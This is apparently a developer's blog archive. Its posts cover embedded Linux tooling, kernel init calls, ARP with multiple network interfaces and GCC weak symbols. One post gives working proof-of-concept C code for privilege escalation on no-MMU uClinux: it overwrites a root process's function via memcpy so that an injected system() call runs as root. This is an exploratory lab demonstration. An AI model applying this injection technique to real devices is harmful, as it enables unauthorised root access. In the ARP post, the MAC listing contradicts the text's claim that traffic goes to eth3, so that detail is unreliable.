Little Blue Linux

February 17th, 2009

I’d like to introduce something that I’m quite passionate about at the moment: a new product I’m managing at work called ‘Little Blue Linux’. It’s a complete Linux distribution that provides everything a developer needs to get started with embedded applications development. More importantly, everything is already set up and configured, so you can start writing your first application or custom embedded Linux distribution (BSP) in less than 20 minutes from first boot - and that’s not an exaggeration.

Little Blue Linux Logo

More often than not, when evaluating Linux on an embedded development board such as the Renesas RSK+ SH7203 or SH7670, you want to test the ground by writing a demo application or proof of concept. For a well-seasoned embedded Linux developer this task is straightforward, and any problems that come up along the way are likely to be ironed out quickly thanks to their many years of experience…

…however for the rest of us this process can seem over-complicated, challenging and always time-consuming. If anything goes wrong, for example being presented with some hideous error message, the temptation to give up becomes hard to resist. Besides, why should we need to know or care about the inner workings of the Linux kernel or tool-chain to write an application?

It’s probably quite useful to take a brief look at what’s involved in translating source code into an application which can run on an embedded development board. The first step is to install a Linux operating system on a development machine - as you can imagine, most of the tools required to build a Linux application are designed to run on Linux. After selecting a suitable OS and installing it, the next step is to install the various software packages required to support development. Next we need to obtain and build the relevant tool-chains and board support packages for our development board. Only at this point can we consider building our application and then worry about deploying it onto the development board. Without going into too much detail, each of these steps can prove challenging or time-consuming. For example, a typical way to deploy an application during development is to use a Network File System (NFS) - however setting this up requires installing NFS on your development machine and then spending quite a bit of time figuring out how to configure it.

Little Blue Linux is provided on a live USB stick (or CD-ROM) so there is no need to re-partition your hard disk in order to make room. The other great thing about a live CD is that moments after boot everything is set up and ready to go - so rather than spend hours figuring out which packages are required or how to set up NFS you can start writing code. Even this step is easier: the main feature of Little Blue Linux is an application aptly named Igloo, which is based on the very popular open-source application Eclipse. Igloo provides a complete integrated development environment (IDE) that allows you to develop applications and embedded Linux distributions without having to touch the command line or learn how to use Linux text editors. Deployment is automatic and debugging is just as easy.

It’s worth mentioning that Little Blue Linux can provide more than just a way to quickly write demo applications for a proof of concept. The BSP project wizard allows you to create an embedded Linux distribution suitable for your development board by selecting components from a list of packages - for example, to create a minimal BSP you can select the kernel, u-boot and busybox packages. You can easily import your application into your BSP design, customise the configurations of your chosen packages (e.g. the kernel, busybox) and finally tweak some of the files of the distribution for your purpose - perhaps to customise how the device boots. During this time you can easily test your customised BSP, and when you are ready for production you can let Igloo generate a binary image suitable for flashing!

Little Blue Linux is very new and we’re still working hard to fine tune some of the features and fully test it - however it will be launched very shortly - just in time for the Embedded World Exhibition. For more information or to try out a free evaluation edition visit the product’s home page - If you’re new to embedded applications development it’s a fantastic way to get started - Let me know how you get on.

Init Call Mechanism in the Linux Kernel

November 17th, 2008

The Linux Kernel has for a long time (at least since v2.1.23) contained a clever and well optimised mechanism for calling initialisation code in drivers. It’s clever because its functionality is largely abstracted from the driver developer and well optimised because after initialisation, memory containing the initialisation code is released. This post explores how the mechanism works.

We’ll start by seeing how driver developers make use of this functionality; the following code has come from v2.6.27.6/drivers/net/smc911x.c and is the driver for a common Ethernet chipset.

static int __init smc911x_init(void)
{
        return platform_driver_register(&smc911x_driver);
}
...
module_init(smc911x_init);

The smc911x_init function can be considered the entry point into the driver - of particular interest are the __init macro and the static declaration. The __init macro marks the function as only being required at initialisation time. Once initialisation has been performed the kernel will remove this function and release its memory. The module_init macro tells the kernel where the initialisation entry point to the module lives, i.e. what function to call at ‘start of day’. In a typical driver you will often see many functions marked with the __init macro, and a single module_init declaration.

Even though we are expecting the kernel to call smc911x_init at ‘start of day’ we have marked it as static, and that is OK (we will see later how the function is called). This is a particular strength of the init call mechanism as it reduces the number of public symbols and reduces the coupling between driver modules and other parts of the kernel.

The optimisation provided by the init call mechanism also provides a means for recovering memory used by initialisation data. Such data can be ‘tagged’ with the __initdata macro.

With the above code in place, at an appropriate time during start-up, the kernel will call the smc911x_init function and once it has been executed its memory will be released. You can see this in the output from kernel boot (e.g. dmesg); for example an x86 machine may print the following:

Freeing unused kernel memory: 386k freed

This means that 386k of memory that previously contained initialisation code and data has now been freed.

OK - So we’ve seen how the mechanism is used, let’s now take a closer look and see how it works under the hood. A quick ‘grep’ reveals that the __init macro is defined in include/linux/init.h:

#define __init      __section(.init.text) __cold

And the __section and __cold macros are defined in the include/linux/compiler*.h files:

compiler.h:      #define __section(S)  __attribute__ ((__section__(#S)))
compiler-gcc4.h: #define __cold        __attribute__ ((cold))

And when we expand it out we get:

#define __init __attribute__((__section__(".init.text"))) __attribute__ ((cold))

Thus, when the __init macro is used a number of GCC attributes are added to the function declaration - in the case of a different compiler, the compiler.h file will ensure the macros expand out to whatever is necessary for the relevant compiler. The cold attribute is a relatively new GCC attribute and has existed since GCC 4.3 - its purpose is to mark the function as one that is rarely used, which results in the compiler optimising the function for size instead of speed. What we are really interested in here is the ‘section’ attribute. The __init macro uses this attribute to tell the compiler to put the text for this function in a special section named “.init.text”. The purpose here is to put all initialisation functions in a single ELF section so that the whole block can be removed after initialisation has been performed.

So what does module_init do? Its exact functionality depends on whether the module in question is built-in or compiled as a loadable module. For the purpose of this post, we’ll just be looking at built-in modules. Back to include/linux/init.h:

#define module_init(x) __initcall(x);
#define __initcall(fn) device_initcall(fn)
#define device_initcall(fn) __define_initcall("6", fn, 6)
#define __define_initcall(level, fn, id) \
           static initcall_t __initcall_##fn##id __used \
           __attribute__ ((__section__(".initcall" level ".init"))) = fn

So another load of macros that result in yet another GCC attribute!

#define module_init(x) static initcall_t __initcall_x6 __used \
                       __attribute__ ((__section__(".initcall6.init"))) = x;

And for clarity, let’s expand out the module_init macro as seen in our Ethernet driver:

static initcall_t __initcall_smc911x_init6 __used
                  __attribute__ ((__section__(".initcall6.init"))) = smc911x_init;

So module_init in the context of a built-in driver results in declaring a function pointer with a unique name to our point of entry. In addition the macro ensures the function pointer is located in a special section of the ELF - we’ll see why shortly.

So at present we have ensured that all our initialisation code is stored in the .init.text section (with any __initdata data in .init.data), and that each module has a function pointer for its point of entry - which has a unique name and is also stored in a special section of the resulting ELF. In addition, at link time the include/asm-generic/vmlinux.lds.h and arch/*/kernel/vmlinux.lds.S scripts ensure that labels/symbols mark the start and end of these sections, i.e. __early_initcall_end and __initcall_end mark the start and end of the function pointers, and __init_begin and __init_end mark the start and end of the init sections, including .init.text.

Finally we are in a position to see how these functions get called and how they are eventually freed. During kernel start-up a function called do_initcalls in init/main.c is called; an excerpt is shown below.

static void __init do_initcalls(void)
{
     initcall_t *call;

     for (call = __early_initcall_end; call < __initcall_end; call++)
          do_one_initcall(*call);
     ...
}

The purpose of this loop is to execute each of the init functions registered by the module_init macros. This is achieved with a simple for loop and a pointer into the table of function pointers. Initially the pointer is set to the label at the start of our function-pointer ELF section, and it is incremented (by the size of one function pointer, sizeof(initcall_t)) until the end of the ELF section is reached. At each step the function pointer it refers to is invoked, via do_one_initcall, and the init function is thus executed.
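The same trick can be tried outside the kernel. What follows is only a minimal userspace sketch, assuming GCC and GNU ld on Linux: the macro demo_initcall, the section name demo_initcalls and the two init functions are all made up for illustration. It relies on the fact that GNU ld provides __start_ and __stop_ symbols for any section whose name is a valid C identifier, which play the role of __early_initcall_end and __initcall_end here.

```c
#include <stdio.h>

/* Same shape as the kernel's initcall_t: a function returning int. */
typedef int (*initcall_t)(void);

/*
 * Hypothetical stand-in for module_init(): store a pointer to fn in a
 * dedicated ELF section. The section name "demo_initcalls" is invented
 * for this sketch; because it is a valid C identifier, GNU ld defines
 * __start_demo_initcalls and __stop_demo_initcalls automatically.
 */
#define demo_initcall(fn) \
    static initcall_t demo_initcall_##fn \
    __attribute__((used, section("demo_initcalls"))) = fn

static int demo_calls;   /* counts how many init functions have run */

/* Two static "driver" entry points, invisible outside this file. */
static int uart_init(void) { demo_calls++; puts("uart_init"); return 0; }
static int net_init(void)  { demo_calls++; puts("net_init");  return 0; }

demo_initcall(uart_init);
demo_initcall(net_init);

/* Section bounds supplied by the linker. */
extern initcall_t __start_demo_initcalls[];
extern initcall_t __stop_demo_initcalls[];

/* Walk the table of function pointers and invoke each one in turn. */
int demo_do_initcalls(void)
{
    initcall_t *call;

    for (call = __start_demo_initcalls; call < __stop_demo_initcalls; call++)
        (*call)();

    return demo_calls;
}
```

Calling demo_do_initcalls() from main runs each registered function once, even though both are static and nothing refers to them by name. Unlike the kernel, this sketch makes no attempt to free the init code afterwards.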

Once initialisation is complete, a function found in the architecture specific code named free_initmem is used to release the memory pages taken up by the initialisation functions and data. The exact nature of the function depends on the architecture.

So in a nutshell the kernel makes clever use of GCC attributes to ensure that initialisation functions and pointers to them are stored in unique sections of the ELF. Initialisation code at kernel start up then iterates through these function pointers and executes them in turn. Finally once all init code has been executed the entire ELF section (.init.text) is freed for use!

Multiple Network Interface Gotcha in Linux

November 9th, 2008

Ok here’s a recipe to try:

  • Get a development board or PC that has two or more network interfaces,
  • Assign each of them a unique IP address,
  • Connect the interfaces to a common network,
  • Finally, ping one of the IP addresses from another machine.

Now, depending on which IP address you chose to ping, you may find that your pings suddenly stop getting responses and time out when you disconnect the other interface (i.e. the interface you are not pinging). Bizarre, isn’t it?

However, as my colleague and I recently discovered whilst debugging a new Ethernet driver, this gotcha is actually correct behaviour for Linux - and in fact it is correct behaviour as defined by the relevant RFCs. I thought I’d use this post to explore what is going on and why this is OK.

In order to reproduce this behaviour I set up a virtual machine and assigned it a number of NAT’d Ethernet devices (4 in fact). I also set up Wireshark (what used to be Ethereal) so that I could monitor any traffic. Here is a cut-down version of the output from ifconfig.

$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:12:0b:bd
          inet addr:192.168.27.132  Bcast:192.168.27.255  Mask:255.255.255.0

eth1      Link encap:Ethernet  HWaddr 00:0c:29:12:0b:c7
          inet addr:192.168.27.133  Bcast:192.168.27.255  Mask:255.255.255.0

eth2      Link encap:Ethernet  HWaddr 00:0c:29:12:0b:d1
          inet addr:192.168.27.135  Bcast:192.168.27.255  Mask:255.255.255.0

eth3      Link encap:Ethernet  HWaddr 00:0c:29:12:0b:db
          inet addr:192.168.27.134  Bcast:192.168.27.255  Mask:255.255.255.0

I cleared the ARP cache on my Windows machine by using “arp -d” and then pinged 192.168.27.132. The packet exchange captured by Wireshark proved to be quite interesting. Let’s take a look.

No.  Source                Destination        Protocol   Info
1  Vmware_c0:00:08       Broadcast             ARP      Who has 192.168.27.132?  Tell 192.168.27.1
2  Vmware_12:0b:db       Vmware_c0:00:08       ARP      192.168.27.132 is at 00:0c:29:12:0b:db
3  192.168.27.1          192.168.27.132        ICMP     Echo (ping) request
4  Vmware_12:0b:d1       Vmware_c0:00:08       ARP      192.168.27.132 is at 00:0c:29:12:0b:d1
5  Vmware_12:0b:c7       Vmware_c0:00:08       ARP      192.168.27.132 is at 00:0c:29:12:0b:c7
6  Vmware_12:0b:bd       Vmware_c0:00:08       ARP      192.168.27.132 is at 00:0c:29:12:0b:bd
7  192.168.27.132        192.168.27.1          ICMP     Echo (ping) reply
8  192.168.27.1          192.168.27.132        ICMP     Echo (ping) request
9  192.168.27.132        192.168.27.1          ICMP     Echo (ping) reply
10 192.168.27.1          192.168.27.132        ICMP     Echo (ping) request
11 192.168.27.132        192.168.27.1          ICMP     Echo (ping) reply

After I invoke the ping command, my machine issues an ARP broadcast, asking for the MAC address currently associated with 192.168.27.132. However all of the network interfaces of my virtual machine respond - resulting in 4 ARP replies. When this happens Windows (and other OS’s) will ignore all but the first response, with the assumption that the first reply must have come from the quickest route.

In this example the quickest ARP reply came from the MAC address associated with eth3. Therefore whenever we communicate with 192.168.27.132, as we have done via ping, the traffic will be sent to eth3. As a result, if we now down interface eth3 with “ifconfig eth3 down”, our pings will fail. This behaviour can be confusing: why should eth3 going down affect traffic that is directed to 192.168.27.132, which we believed to be associated with eth0?
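To make the “first reply wins” behaviour concrete, here is a toy model of it in C. It is only a sketch of the behaviour described above, not how Windows or any other OS actually implements its ARP cache; the names arp_cache, arp_lookup, arp_handle_reply and arp_replay_capture are all hypothetical. The replay function feeds in the four ARP replies from the capture in their arrival order.

```c
#include <stdio.h>
#include <string.h>

#define ARP_CACHE_SLOTS 8

/* One cache entry mapping an IPv4 address to a MAC address. */
struct arp_entry {
    char ip[16];    /* dotted-quad IPv4 address */
    char mac[18];   /* colon-separated MAC address */
    int  used;
};

static struct arp_entry arp_cache[ARP_CACHE_SLOTS];

/* Return the cached MAC for ip, or NULL if it has not been resolved. */
const char *arp_lookup(const char *ip)
{
    for (int i = 0; i < ARP_CACHE_SLOTS; i++)
        if (arp_cache[i].used && strcmp(arp_cache[i].ip, ip) == 0)
            return arp_cache[i].mac;
    return NULL;
}

/*
 * Handle an ARP reply. Returns 1 if the reply was stored, 0 if it was
 * ignored because the address was already resolved (or the cache is full).
 */
int arp_handle_reply(const char *ip, const char *mac)
{
    if (arp_lookup(ip) != NULL)
        return 0;   /* first reply wins; later ones are dropped */

    for (int i = 0; i < ARP_CACHE_SLOTS; i++) {
        if (!arp_cache[i].used) {
            snprintf(arp_cache[i].ip, sizeof arp_cache[i].ip, "%s", ip);
            snprintf(arp_cache[i].mac, sizeof arp_cache[i].mac, "%s", mac);
            arp_cache[i].used = 1;
            return 1;
        }
    }
    return 0;
}

/* Replay the four replies from the capture, in their arrival order. */
const char *arp_replay_capture(void)
{
    const char *ip = "192.168.27.132";

    arp_handle_reply(ip, "00:0c:29:12:0b:db");   /* eth3 */
    arp_handle_reply(ip, "00:0c:29:12:0b:d1");   /* eth2 */
    arp_handle_reply(ip, "00:0c:29:12:0b:c7");   /* eth1 */
    arp_handle_reply(ip, "00:0c:29:12:0b:bd");   /* eth0 */
    return arp_lookup(ip);
}
```

Under this model the address resolves to eth3’s MAC even though ifconfig lists it against eth0, which is why taking eth3 down breaks the ping.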

Despite the impression ifconfig gives, Linux associates IP addresses with the host as opposed to individual interfaces of the host. With that in mind, the behaviour we’ve seen doesn’t seem so bizarre. When a network interface receives an ARP request for an IP address which the host owns, then in effect a valid network route has been made between the requestor and the requested. This route could potentially be the only route, and as it is likely that the two will communicate with each other, it makes sense to reply to the ARP request. And this is what happens - the network interface that received the ARP request will now act as a proxy for the requested IP address.

This behaviour is actually quite convenient. In our example, even though our pings began to fail once we disconnected a route to the host - as soon as the Windows ARP cache times out (after 10 minutes) another ARP request will be broadcast. Like before, any interface that can provide a route to the host will respond, and so connectivity will be restored. If Linux wasn’t designed in this way and each interface truly owned an IP address, then if that link went down connectivity would never be restored to that address - even though there are other physical connections to the machine that has that IP address!

The other point of interest here, at least with this contrived networking configuration, is that reliability is favoured over performance. The reason is that where multiple interfaces exist on a machine, it’s quite likely that a priority ordering will exist between them. And so if, as in this case, eth3 replies the quickest then it is likely that it will always be the quickest. As a result, it is also likely to respond to all the ARP requests first and so all traffic for the 4 IP addresses will arrive on a single interface. We can demonstrate this. After pinging all of the IP addresses assigned to my virtual machine we can examine the ARP cache of Windows.

arp -a

Interface: 192.168.27.1 --- 0x2
  Internet Address      Physical Address      Type
  192.168.27.132        00-0c-29-12-0b-bd     dynamic
  192.168.27.133        00-0c-29-12-0b-bd     dynamic
  192.168.27.134        00-0c-29-12-0b-bd     dynamic
  192.168.27.135        00-0c-29-12-0b-bd     dynamic

As you can see all the IP addresses correspond to the same interface, i.e. eth3. Thus all the traffic will go over a single 10/100Mbit link instead of 4 links.

Fortunately, where this behaviour isn’t ideal, the proc interface provides a means to modify it. Of particular interest are the arp_filter and rp_filter sysctl knobs, which can be found under /proc/sys/net/ipv4/conf/. I’ve not really managed to make complete sense of these yet and may well write another post on them in the future. To see the behaviour described above I did need to invoke “echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter”; without this I would only ever get two ARP replies instead of 4 - I’m not entirely sure why this is… suggestions anyone?
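If you would rather poke these knobs from a program than from the shell, the files under /proc/sys can be read and written like any other small text file. The helpers below are a minimal sketch of that; the names sysctl_read_int and sysctl_write_int are my own and are not part of any library.

```c
#include <stdio.h>

/* Read a single integer from a /proc/sys style file. Returns 0 on success, -1 on failure. */
int sysctl_read_int(const char *path, int *value)
{
    FILE *f = fopen(path, "r");
    int ok;

    if (f == NULL)
        return -1;
    ok = (fscanf(f, "%d", value) == 1);
    fclose(f);
    return ok ? 0 : -1;
}

/* Write a single integer, the equivalent of "echo N > path". Returns 0 on success, -1 on failure. */
int sysctl_write_int(const char *path, int value)
{
    FILE *f = fopen(path, "w");
    int ok;

    if (f == NULL)
        return -1;
    ok = (fprintf(f, "%d\n", value) > 0);
    if (fclose(f) != 0)   /* the write may only be reported as failed on close */
        ok = 0;
    return ok ? 0 : -1;
}
```

For example, sysctl_write_int("/proc/sys/net/ipv4/conf/all/rp_filter", 0) does the same job as the echo command above and, like it, needs root privileges.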

And finally, for those that wish to read more, I recommend an article on LWN which provides some more background information.

Privilege Escalation in uClinux

November 4th, 2008

The main difference between Linux and uClinux is that the latter is designed to work with systems without an MMU (Memory Management Unit). The main benefit of an MMU is that systems that utilise one can provide each process with its own virtual address space - by doing so each process is prevented from causing disruption to others.

uClinux systems do not have an MMU, so all processes share a common address space and there is often, but not always (see comments at the end of this post), no protection from processes interfering with each other. The security implications of this are widely known and understood - the applications of uClinux systems are usually such that this isn’t of great concern. However I wanted to see this for myself - I wanted to put the theory into practice, see how easy it is to disrupt another process, and see if privilege escalation can be achieved.

For my investigations I installed MPC Data’s board support package (BSP) on a Renesas RSK+ 7203 development board. The board is based on a nippy 200MHz SuperH SH-2A core and provides a host of features including serial, Ethernet, LCD, USB, etc. To speed up the development cycle I also set up an NFS mounted filesystem.

To start, I wanted to see if writing into another process is really that straightforward. My final output is two executables, as follows.

process1.c
#include <stdio.h>

/* volatile stops the compiler turning the loop below into while(1) */
volatile int value = 20;

int main(void)
{
   printf("%s:Process 1 started with Value %d, &Value = %p\n",
          __FILE__, value, (void *)&value);
   /* Spin until some other process overwrites the variable */
   while (value == 20)
     ;

   printf("%s:Value is now %d\n", __FILE__, value);
   return 0;
}

process2.c
#include <stdio.h>

int main(void)
{
   /* Address printed by process1; only meaningful on the same no-MMU system */
   volatile int *value = (volatile int *)0xcf04084;

   printf("%s:Value has been set from %d to %d\n", __FILE__, *value, 10);
   *value = 10;

   return 0;
}

The first process displays the value and address of a global variable and waits for it to change - if it does, it displays the new value. The variable is a global to reduce the likelihood of its address changing too much between runs, and is volatile to prevent any optimisation from turning the while loop into a while(1).

The second process is designed to modify the variable in the first process. This code is straightforward: it creates a pointer, points it at our known address (as printed by the first process) and modifies the value.

Let’s see what happens when we build and run…

$ sh-linux-gcc -m2e -mb process1.c -elf2flt=s65546 -o process1
$ sh-linux-gcc -m2e -mb process2.c -elf2flt=s65546 -o process2

> ./process1 &
process1.c:Process 1 started with Value 20, &Value = 0xcf04084

> ./process2
process2.c:Value has been set from 20 to 10
process1.c:Value is now 10

Fantastic! Using one process we were able to modify another process’s address space. However, we still haven’t managed to escalate our privileges - my next step is to try to get another process with higher privileges to execute our functions; in theory this can be done with a simple memcpy. This took me a bit longer to get right, as I originally intended to search the address space for known code, perhaps the call site of a printf or a destructor, and modify it such that it calls our function instead - however this proved a little more tricky and is something I will come back to.

Take a look at this code:

process3.c
#include <stdio.h>
#include <unistd.h>   /* sleep() */

void function(void)
{
   sleep(10);
}

int main(void)
{
   printf("Function - %p\n", (void *)function);
   while (1)
   {
     function();
   }
}

process4.c
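#include <stdlib.h>   /* system() */
#include <string.h>   /* memcpy() */

void inject(void)
{
   system("whoami");
}

int main(void)
{
   /* Destination is the address printed by process3. The length assumes
      that main() is placed directly after inject() in the binary. */
   memcpy((void *)0xc8200dc, (void *)inject, (char *)main - (char *)inject);
   return 0;
}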

The code describes two processes. The first represents a process that may be running with privileges that we wish to obtain, and the second represents a process that will be used to perform our privilege escalation exploit to obtain the privileges of the first. Just like the previous example, process 3 prints the memory address of the function it regularly calls. Likewise process 4 uses memcpy to copy its inject function into the address space of process 3. The idea is that when function is called, our inject code will be executed instead. The inject code simply invokes the whoami executable to print the user running the code.

Let’s give it a go…

$ sh-linux-gcc -m2e -mb process3.c -elf2flt=s65546 -o process3
$ sh-linux-gcc -m2e -mb process4.c -elf2flt=s65546 -o process4

root> ./process3 &
60
Function - 0xc8200dc
root> su andy
andy> ./process4
root

It works! As the output shows, we start off by running our process 3 in the background with root privileges - the process ID is displayed and so is our function address. We then run our process 4 under the ‘andy’ user - shortly after it executes, the function is called, but instead of sleeping our inject code is invoked and whoami successfully prints out ‘root’ instead of ‘andy’. So effectively we have been able to invoke a process with privileges that we are not entitled to, i.e. when logged in as andy we have executed whoami as root!

However, this is hardly a polished and practical exploit, as we are relying on another process to co-operate and print the key addresses of its code. Additional work would be needed to find the location of suitable and interesting parts. There are numerous ways of doing this but they are beyond the scope of today’s post.

It took me quite a few attempts for this to work as it does, and still it is not 100% reliable - simply memcpy’ing functions and expecting them to work hides the complexities of the underlying machine code. Even though our system call was executed correctly, adding printfs before or after doesn’t always work - it’s a much more complicated picture. Nevertheless we achieved our goal and performed privilege escalation under uClinux (albeit with a little help from the exploited executable).

The next steps and perhaps a future post would be to study this further under GDB and see how this can be used in practice on a typical embedded system.

Digging Deeper into Weak Symbols

October 29th, 2008

Following on from my last post, I thought I’d dig a bit deeper into GCC’s weak symbols and use the NM utility from GNU’s Binutils package to help understand a bit better how it works.

I probably don’t use the Binutils package as often as I should when debugging and thought this post would be a perfect opportunity to do so - for those that are unfamiliar with it, it’s a package that usually comes with your compiler and provides the ability to explore and manipulate the object code of various binaries. It consists of things like readelf, objdump, nm, etc - sound familiar?

To get started I created some simple source:

weak.c
#include <stdio.h>

void __attribute__((weak)) test()
{
  printf("%s:%d - Original test()\n", __FILE__, __LINE__);
}

int main()
{
  test();
}

weak2.c
#include <stdio.h>

void test()
{
  printf("%s:%d - Overridden test()\n", __FILE__, __LINE__);
}

And then I built it and executed it as follows:

$ gcc -c weak.c weak2.c
$ gcc weak.o weak2.o -o weak
$ ./weak
weak2.c:5 - Overridden test()
$

So as expected the original weak test function was overridden by the test function in weak2.c - so far so good! We compiled both C files as separate relocatable units so that we could examine each object file before linking - let’s do that.

By using “nm” we can examine the symbols from both .o files. We do this with the following command:

$ nm weak*.o

weak2.o:
         U printf
00000000 T test

weak.o:
00000024 T main
         U printf
00000000 W test
$

The output shows the value, type and name of each symbol found in the objects. printf is shown as (U)ndefined: it lives in libc and we haven’t yet linked against it, which is also why it doesn’t have an address. The main function is shown as (T)ext, meaning it is found in the code section of the object - the address 0x24 is its offset from the start of that section. Finally we have our test function symbols - they are found at address 0x00 (possibly because they were found at the start of their source files), however their symbol types are labelled differently. Our weak test function is labelled (W)eak and our non-weak function is labelled (T)ext.

With regard to weak symbols it’s easy to imagine what the linker does: whenever it discovers a symbol whose name matches one already discovered, then if both are of type T it bails out with a multiple definition error, and if one is T and one is W it discards the W symbol and keeps the T symbol. But what happens when both are (W)eak?

After some experimentation it seems that when declaring multiple weak symbols of the same name (which seems to be allowed), the symbol used is the one first encountered! (This can be demonstrated by using the existing code but making both test functions weak - the program outputs different results depending on whether gcc weak.o weak2.o -o weak or gcc weak2.o weak.o -o weak is used!) Seems nasty to me.

Finally we can see the resultant output with our linked binary:

$ nm weak
...
080483bc T main
         U printf@@GLIBC_2.0
08048374 T test
...

The first thing you’ll notice is there are a lot more symbols, this is because we’re now looking at an executable rather than a relocatable object file. The difference is the linker will have linked together the multiple object files and added various symbols to support the Linux loader and additional code both before and after the main (but more on this in another post). The second thing to notice is that the addresses are suddenly much higher - this is because the symbols are now using virtual memory addresses.

Finally you’ll notice that printf is still (U)ndefined, though there is now a @@GLIBC_2.0 appended to the end of it - this is because we’re using shared libraries. Try building with the “-static” flag and look at the difference.

The nm utility is just one of many utilities in the binutils package - when fully understood these utilities can provide a great insight and a useful debugging tool. I find it easy to take for granted the workings that go on under the hood and the more time I spend exploring the more questions I raise. I have no doubt that my attempts to answer some of these questions will result in many more posts.

GCC Weak Symbols

October 18th, 2008

GNU’s GCC has a useful (and perhaps not very well known) feature known as ‘weak symbols’. I first discovered this a while back when building a Linux kernel: unbeknown to me, the Linux kernel makes great use of weak symbols, yet the compiler I used did not correctly support them. Rather than failing to build, the kernel built fine and even ran - I was instead presented with a number of interesting bugs, but more on this later.

In a nutshell, weak symbols permit you to define a symbol that doesn’t need to be resolved at link time, i.e. they allow you to tell the compiler that this function may not have a body and that is OK. Furthermore, if the linker later comes across another symbol with the same name that doesn’t have the weak attribute, the original symbol will be overridden by the stronger symbol (without a multiple definition linker error). And finally you can also use the symbol to determine, at run-time, whether such a body exists.
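The run-time check is perhaps the least obvious of these, so here is a minimal sketch of it, assuming GCC on an ELF target such as Linux. The names optional_hook and call_hook_if_present are hypothetical. The function is declared weak but never defined, so the program still links and the symbol’s address simply comes out as zero.

```c
#include <stdio.h>

/*
 * Weak declaration with no definition anywhere in this program.
 * Without the weak attribute the call below would fail to link.
 */
extern void optional_hook(void) __attribute__((weak));

/* Call the hook only if some object file actually provided a body for it. */
int call_hook_if_present(void)
{
    if (optional_hook) {   /* address is zero when the symbol is unresolved */
        optional_hook();
        return 1;
    }
    puts("optional_hook not provided, skipping");
    return 0;
}
```

If another object file that defines optional_hook is added to the link, the same code calls it without being recompiled.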

To give you an example of its use let’s refer back to my original bug…

v2.6.27/arch/sh/kernel/cpu/clock.c
void __init __attribute__ ((weak))
arch_init_clk_ops(struct clk_ops **ops, int type)
{
}

This function is part of the architecture specific (SH) code for setting up the various clocks of the device. The function defined above is used to return a structure of clock operations (struct clk_ops) which is later used to register the clock within the kernel. As you can see the function is declared with a weak symbol via the “weak” attribute. Therefore, when built correctly, the function can be overridden.

The design of this part of the kernel is such that generic clock operations are defined in clock.c and can later be overridden via weak symbols by implementations for specific CPU subtypes - for example this function is overridden in the clock-sh7712.c file…

v2.6.27/arch/sh/kernel/cpu/clock-sh7712.c
void __init arch_init_clk_ops(struct clk_ops **ops, int idx)
{
...

The function hasn’t been defined as a weak symbol and so will override the weak symbol. In this case the function will provide the caller with the clock operations specific to the SH7712. In this manner the existing generic clock support code has been designed such that it can be easily extended to support future SH subtypes. Likewise weak symbols are used elsewhere in the kernel (since 2.4.0) for similar effect.
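The pattern can be sketched in a single file. This is a cut-down illustration only and not the kernel’s actual code: struct demo_clk_ops, generic_clk_ops, demo_init_clk_ops and demo_select_clk_ops are all hypothetical names, and the idea that the caller starts from a generic set of operations is my assumption.

```c
/* Hypothetical, cut-down stand-in for the kernel's struct clk_ops. */
struct demo_clk_ops {
    const char *name;
};

static struct demo_clk_ops generic_clk_ops = { "generic" };

/*
 * Weak default: does nothing, so the caller keeps the generic operations.
 * A CPU-specific file can define a non-weak demo_init_clk_ops() and the
 * linker will pick that one instead, with no multiple definition error.
 */
void __attribute__((weak)) demo_init_clk_ops(struct demo_clk_ops **ops, int idx)
{
    (void)ops;
    (void)idx;
}

/* Start from the generic operations and give the hook a chance to replace them. */
const struct demo_clk_ops *demo_select_clk_ops(int idx)
{
    struct demo_clk_ops *ops = &generic_clk_ops;

    demo_init_clk_ops(&ops, idx);
    return ops;
}
```

Built on its own, demo_select_clk_ops returns the generic operations. Linking in a second file with a non-weak demo_init_clk_ops that assigns *ops changes the result without touching this file.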

Whilst my version of GCC claimed to support weak symbols, there was a known GCC bug that prevented this from working correctly. I found that the code would only work correctly if the weak arch_init_clk_ops function had code in its body - what was happening was that the compiler was optimising out the function altogether (with the -O2 optimisation GCC flag), which resulted in the non-weak symbol not being called. (There is a quick hack to fix this, which is to use the -fno-unit-at-a-time flag; however this is expected to be removed from GCC in the future.)

It’s always worth looking at the “Documentation/Changes” file included with the kernel: it contains a list of the tools required and the minimum version of each tool. Just because the kernel builds doesn’t mean that it has built in the way intended by the Linux contributors!

References:

GCC Function Attributes (gnu.org)
GCC Help Mailing List Archive - Discussing weak symbols and optimisation (gnu.org)
Further Discussion of this bug in KGDB - Here (osdir.com) and Here (lkml.org)